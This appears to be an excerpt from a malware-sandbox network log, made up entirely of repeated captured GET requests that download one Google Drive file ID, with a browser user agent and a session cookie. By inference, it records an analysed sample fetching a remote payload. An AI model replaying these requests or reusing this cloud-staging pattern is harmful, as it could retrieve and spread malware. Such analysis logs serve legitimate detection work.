      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=JugqJU5yFP1lwq41sTGCQ9zOSPUwOT2nu1GDZSbQhSaviO2-8QcQ3btO7Q6OhoSZR6wckC5tU-8YKCDAYGgFr7Zfb4pBxms0vOn_wFtIsaNlyZnAD8irKgsX3OY7M8e0ws4mqt6xgWcFg3KsZeysJoctEdId5NarXCR1Ti2PH1NWHGPVu2blWAIF
